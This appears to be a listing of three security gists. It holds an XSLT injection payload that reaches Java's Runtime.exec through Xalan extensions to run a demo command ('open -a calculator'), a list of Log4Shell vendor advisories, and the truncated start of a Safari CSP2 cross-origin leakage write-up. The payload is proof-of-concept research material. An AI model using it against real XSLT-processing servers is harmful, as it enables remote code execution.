thanatoskira

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

SwitHak

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

• If you want to add a link, comment or send it to me
• Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

• Royce Williams list sorted by vendors responses Royce List
• Very detailed list NCSC-NL
• The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List

nishimunea

Safari cross-origin data leakage in CSP2

Safari 10 has supported a new security feature "Content Security Policy Level 2", CSP2, that is a W3C standard proposed for mitigating common security attacks on the web applications, e.g. XSS.

CSP2 has an interesting directive "frame-ancestors" that replaces and obsolete existing X-Frame-Options header. If a document is delivered with frame-ancestors 'self' in the header a user-agent rejects loading of the document as a frame content of the other origins. And if "report-uri" is set together a user-agent sends a violation report to the provided endpoint to inform observation of framing attacks. This report could be a good information to be aware of HTTP/L7 client side attacks in t